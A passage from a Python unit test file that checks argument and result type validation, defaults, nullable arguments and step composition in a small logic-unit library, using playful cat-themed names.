assert isinstance(result, dict)
assert result['the_cat_has_spoken']
assert result.the_cat_has_spoken == True
def test_alt_result_value(self):
class Unit(LogicUnit):
meow = ArgSpec(bool, docs="The meow.")
the_cat_has_spoken = ResultSpec(bool, default=True, docs="Has the cat spoken?")
def __call__(self, meow):
return {'the_cat_has_spoken': False}
test = Unit()
result = test(meow=True)
assert isinstance(result, dict)
assert not result['the_cat_has_spoken']
def test_wrong_type_result_value(self):
class Unit(LogicUnit):
the_cat_has_spoken = ResultSpec(bool, default=True, docs="Has the cat spoken?")
def __call__(self):
self.result.the_cat_has_spoken = 'meow'
#return self.get_result_map()
test = Unit()
nose.tools.assert_raises(TypeError, test)
def test_resultspec_in_multiple_instances(self):
class Unit(LogicUnit):
meow = ArgSpec(bool, docs="The meow.")
the_cat_has_spoken = ResultSpec(bool, docs="Has the cat spoken?")
def __call__(self, meow):
self.result.the_cat_has_spoken = meow
test = Unit()
doppelganger_test = Unit()
result_1 = test(meow=True)
result_2 = doppelganger_test(meow=False)
assert result_1['the_cat_has_spoken']
assert not result_2['the_cat_has_spoken']
# don't change this name, test above depends on it.
a_callable = Mock()
class TestLogicUnit(unittest.TestCase):
def test_args(self):
this = self
class Unit(LogicUnit):
astr = ArgSpec(str, docs="A string value")
def __call__(self, an_arg, astr="s", context=None):
this.value = an_arg
assert Unit.AN_ARG == "an_arg"
assert Unit.ASTR == "astr"
u = Unit()
# this is fine:
u(an_arg=1, astr="grr")
assert self.value == 1
assert Unit._accepts_context
# this should fail type checking
nose.tools.assert_raises(TypeError, u, an_arg=1, astr=1) #@UndefinedVariable
def test_composition(self):
class Domain(object): pass
class UserProfile(object): pass
class IsSameDomainUser(LogicUnit):
domain = ArgSpec(Domain)
user = ArgSpec(UserProfile)
def __call__(self, user, domain):
if not user.domain_id == domain.id:
raise Exception()
assert not IsSameDomainUser._accepts_context
s = Step(IsSameDomainUser(), arg_map={IsSameDomainUser.USER: 'actor',
IsSameDomainUser.DOMAIN: 'domain'})
class Context(DefaultContext):
domain = Domain()
actor = 1
assert s
assert isinstance(s._call, IsSameDomainUser)
with nose.tools.assert_raises(TypeError): #@UndefinedVariable
s(Context())
def test_default_value(self):
class HasADefault(LogicUnit):
meow = ArgSpec(int, default=1)
def __call__(self, meow):
if meow == 1:
raise ValueError()
raise IndexError()
assert HasADefault.MEOW is not None
nose.tools.assert_raises(ValueError, HasADefault()) #@UndefinedVariable
nose.tools.assert_raises(ValueError, HasADefault(), meow=1) #@UndefinedVariable
nose.tools.assert_raises(IndexError, HasADefault(), meow=10) #@UndefinedVariable
def test_nullable(self):
class Nullable(LogicUnit):
meow = ArgSpec(int, nullable=True)
def __call__(self, meow):
if meow is None:
raise ValueError()
return meow
# the default is none
nose.tools.assert_raises(ValueError, Nullable()) #@UndefinedVariable
nose.tools.assert_raises(ValueError, Nullable(), meow=None) #@UndefinedVariable
assert Nullable()(meow=10) == 10
class TestArgSpec(unittest.TestCase):
def test_any_arg(self):
s = ArgSpec(default="meow")
assert s.default == 'meow'
assert s.types == (object,)
self.assertRaises(ValueError, ArgSpec, int, meow="bad arg")
def test_bad_kwarg(self):
self.assertRaises(ValueError, ArgSpec, int, meow="bad arg")
class TestFlow(unittest.TestCase):
def test_run_example_1(self):
ctx = run_example_1()
assert ctx
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.